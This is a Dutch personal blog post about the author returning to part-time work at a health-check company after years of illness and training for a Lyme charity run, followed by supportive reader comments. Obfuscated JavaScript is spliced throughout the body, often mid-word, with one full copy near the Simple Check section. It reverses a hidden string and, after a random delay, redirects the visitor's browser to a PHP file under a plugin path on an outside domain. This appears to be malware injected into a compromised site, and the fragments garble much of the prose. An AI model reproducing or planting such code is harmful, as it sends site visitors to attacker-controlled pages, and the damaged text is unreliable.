Persoonlijk

Een flinke stap vooruit – Ik ben weer aan het werk

Het is de afgelopen maanden erg stil op mijn blog. Maar dit betekent niet dat er niks te vertellen is. Integendeel. Ik ben de afgelopen tijd hard bezig geweest met werken aan verder herstel. Maar ook ben ik bezig geweest met het opnieuw proberen vorm te geven van mijn leven. In toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totaal heb ik bijna 3,5 jaar ziek thuis gezeten. Maar het gaat beter en de muren begonnen de afgelopen tijd dan ook steeds meer op mij af te komen. Ik was er aan toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe om weer aan het werk te gaan. Ik ben dus druk bezig geweest met solliciteren en dat heeft goed resultaat gehad, want inmiddels ben ik weer wat uurtjes aan het werk! In deze update zal ik hier wat meer over gaan vertellen.

Solliciteren

Ik heb een verpleegkunde diploma en ben altijd werkzaam geweest als verpleegkundige in de GGZ. Solliciteren naar toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totaal andere functies met hiervoor geen diploma’s en werkervaring en dan ook nog eens met een gat van 3,5 jaar in mijn CV vanwege ziekte. Niet echt wat je noemt een situatie waarbij de kans groot is om snel een baan te vinden. Na een tip van iemand heb ik er voor gekozen om op Facebook en op LinkedIn een oproep te plaatsen met een opvallende afbeelding erbij. Dit bleek een goede zet, want ik kreeg de weken erna echt ontzettend veel berichtjes met tips, maar ook werd ik benaderd door bedrijven die mijn oproep hadden gezien en wellicht wat voor mij zouden kunnen betekenen. Ik had er een flinke taak aan om alle berichten te beantwoorden. In die periode heb ik ook een aantal sollicitatiegesprekken gehad. Het voelde best kwetsbaar om op deze manier mijn zoektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocht naar een baan kenbaar te maken, maar ik ben blij dat ik dit heb gedaan. Mocht je dus in dezelfde situatie zitten, misschien is het een idee om te overwegen iets soortgelijks te doen!

Afbeelding baan gezocht

Simple Check

Een van de bedrijven die contact opnam naar aanleiding van mijn oproep is Simple Check. Simple Check is een organisatie die zich inzet voor duurzame inzetbaarheid van werknemers. Dit doen ze onder andere door het afnemen van Health Checks bij werknemers op locatie. In eerste instantie was het idee dat ik als Health Check medewerker aan de slag zou gaan. Maar de dagen die het Health Check team maken zijn erg lang. En doordat je op locatie aan het werk bent is er geen mogelijkheid voor het opbouwen van uren. Om dagen van 8, 9 of 10 uur te maken na 3,5 jaar thuis te hebben gezeten leek toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch wat te hoog gegrepen.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-Facebook-300×300.png” alt=”Simple Check ” width=”300″ height=”300″ />

Een kans

Maar gelukkig stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topte het gesprek hier niet. Bij Simple Check zijn ze bereid mij een kans te geven. Momenteel ben ik drie dagdelen in de week aan het werk op kantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toor. Ik hou mij bezig met werkzaamheden op het gebied van communicatie. Zo ga ik mij bezighouden met de Facebookpagina van Simple Check. Hiervoor maak ik dan bijvoorbeeld mooie afbeeldingen met quotes. Ook deel ik relevante informatie over alles met betrekking toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot mentale en fysieke gezondheid. En ik mag gaan bloggen voor de website. Deze week heb ik mijn eerste blog geschreven en deze wordt binnenkort op de website gepubliceerd! Zoals jullie weten is schrijven iets wat ik erg leuk vind om te doen en ik ben dan ook echt ontzettend blij dat ik deze kans krijg.

Omgaan met

Ook al vind ik het best wel pittig, het geeft een ontzettend goed gevoel om weer aan het werk te zijn. Ik loop uiteraard tegen beperkingen aan, maar deze ken ik inmiddels. En ik kan er rekening mee houden. Zo probeer ik bijvoorbeeld tussendoor regelmatig even te gaan lopen. En ik probeer werkzaamheden af te wisselen. Uren achter elkaar geconcentreerd bezig zijn vraagt te veel van me, maar als ik dit afwissel met bijvoorbeeld het maken van een afbeelding tussendoor, lukt het wel goed. Daarnaast zorg ik ervoor dat ik de dagen dat ik werk verder geen verplichtingen heb en dus ook echt mijn rust kan pakken als dit nodig is.

Leuke organisatie

Het werk dat ik nu doe vind ik hartstikke leuk. Het is wel allemaal nieuw voor me, dus ik heb een hoop te leren. Maar ik voel mij op mijn gemak en ben ontzettend blij dat ik deze kans gekregen heb. Ik hoop dat ik mij de komende tijd verder kan ontwikkelen en ik uiteindelijk weer echt een volledige baan heb. Maar, dat heb ik wel geleerd de afgelopen jaren, stapje voor stapje. En met deze stap ben ik al ontzettend blij!

Lopen voor Lyme

Naast de stap om aan het werk te gaan, zet ik ook nog andere stappen. Alleen dan letterlijk. Ik ben namelijk nog steeds hard aan het trainen voor Lopen voor Lyme. Ik heb mijzelf als doel gesteld om een uur te gaan hardlopen in het team van Marlon. Of het mij ook daadwerkelijk gaat lukken, dat weet ik niet, maar ik wil er in elk geval wel alles aan gedaan hebben. Ik train zo hard als dat ik kan, maar pas dit wel aan op hoe ik mij voel. Dit houd in dat ik nu ik werk wel iets minder  vaak sport en ook wat minder intensief. Maar Lopen voor Lyme is wel een mooie stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok achter de deur om wel te blijven trainen, al is het soms alleen maar even een wandeling.

Sponsors

Voor Lopen voor Lyme ben ik uiteraard nog steeds op zoek naar sponsors. Al het sponsorgeld komt meteen terecht bij Marlon zelf, zodat zij dit kan gebruiken voor kosten voor haar behandeling. Sponsoren kan via de teampagina van team Marlon Bites Back.  Op deze pagina kan je ook meer informatie vinden over Marlon en de verdrietige situatie waar zij in zit.

Lopen voor Lyme - Marlon

Facebook reacties

14 Reacties

 • Reply
  Anoniem
  19 februari 2018 at 06:29

  Inderdaad hartstikke stil! maar goed om te horen…

 • Reply
  Anoniem
  19 februari 2018 at 06:39

  Zo tof voor je!

 • Reply
  Anoniem
  19 februari 2018 at 07:30

  Powervrouw echt!! Trots op jou. Je bericht ontroerd me. Ik weet waar je vandaan komt en hoe zwaar het was en nog steeds is. Diepe buiging voor jou❤️

 • Reply
  Anoniem
  19 februari 2018 at 07:47

  Goed zeg, heel veel suc6 topper !!
  En geniet er van….

 • Reply
  Anoniem
  19 februari 2018 at 07:52

  Dat Simple Check boft maar met die positieve en enthousiaste dochter van mij

 • Reply
  Anoniem
  19 februari 2018 at 07:56

  Super zeg..wat een leuke baan..wat Goed dat het bedrijf je de ruimte geeft❤

 • Reply
  Anoniem
  19 februari 2018 at 08:04

  Echt een power woman voorbeeld voor velen

 • Reply
  Anoniem
  19 februari 2018 at 08:47

  Gefeliciteerd!!!! Warme groet, Verona en Lisa Lyme dat blijft plakken

 • Reply
  Anoniem
  19 februari 2018 at 09:08

  Heel bemoedigend om dit te horen! En super dat je voor Marlon gaat lopen!

 • Reply
  Anoniem
  19 februari 2018 at 09:13

  Gefeliciteerd

 • Reply
  Anoniem
  19 februari 2018 at 09:20

  Wat stoer. Nieuwe baan wat echt iets anders is dan vpk. Topper! Stijgende lijn vooruit

 • Reply
  Anoniem
  19 februari 2018 at 09:20

  Dit geeft moed!!!!

 • Reply
  Anoniem
  19 februari 2018 at 10:44

  Suc6 meis!!! Wauw, daar mag je zo trots op zijn.

 • Reply
  Anoniem
  19 februari 2018 at 23:32

  Mooi om te lezen Marleen !!! Veel succes.

 • Leave a Reply

  Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.

  %d bloggers liken dit: